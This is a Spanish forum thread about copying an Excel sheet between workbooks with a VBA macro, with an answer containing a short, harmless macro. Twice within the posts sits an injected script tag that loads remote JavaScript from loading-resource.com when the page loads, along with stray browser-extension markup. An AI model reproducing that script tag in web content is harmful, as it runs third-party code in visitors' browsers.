Seleccionar una Hoja Excel desde otro fichero excel VBA

Hola Expertos!

Necesito vuestra ayuda. Tengo dos ficheros de los cuales quiero que de uno copie una Hoja (o algunas columnas) y me las envíe a otro fichero.

Ejemplo: del fichero A quiero que me copie una hoja y me la pase a B.

Había pensado en un recuadro donde salgan todos los excel e ir seleccionando el fichero.

Para cualquier cosa podéis contactar conmigo por email, [email protected]

Gracias

Un Saludo

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

1 respuesta

Respuesta
1

Espero que te encuentres bien.

A ver si con esto te puedo ayudar. Para poder hacer esto mediante una macro sera necesario que tengas abierto los dos libros al mismo tiempo y que sus nombres no se modifiquen.

Te detallo lo que hace la macro:

- Selecciona la Hoja1.

- Copia la Hoja1 en el archivo que se llama Ejemplo2.xlsx

Sub Macro2()
Sheets("Hoja1").Select
Sheets("Hoja1").Copy Before:=Workbooks("Ejemplo2.xlsx").Sheets(1)
End Sub

Lo siento lucasrios, pero esta solución no me resuelve mi problema, necesito que como requisito no tenga que estar abierto la hoja que quiero copiar.

La idea que yo tengo es algo diferente ya que me gustaría con un cuadro de selección que me seleccionase el excel que yo quisiera y me copiara una Hoja.

Sinceramente no logro comprender bien tu requisito.

Por favor si es posible envianos información mas detallada.

si quieres te dejo mi correo y con un ejemplo y los ficheros igual conseguimos entendernos.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

Dale perfecto.

Atentamente.

Lucas.

<div id="wrc-float-icon" style="z-index: 2147483646; left: 15px; top: 15px; width: 42px; height: 42px; background-image: url('safari-extension://com.avast.wrc-6H4HRTU5E3/127bb75a/images/float/green-1.png'); position: fixed; display: none;"> </div>

[email protected]

Espero tu respuesta

un saludo

No olvides finalizar la consulta.

Atentamente.

Lucas.

<div id="wrc-float-icon" style="z-index: 2147483646; left: 15px; top: 15px; width: 42px; height: 42px; background-image: url('safari-extension://com.avast.wrc-6H4HRTU5E3/d7f7df92/images/float/green-1.png'); position: fixed; display: none;"> </div>

Añade tu respuesta

Haz clic para o

Más respuestas relacionadas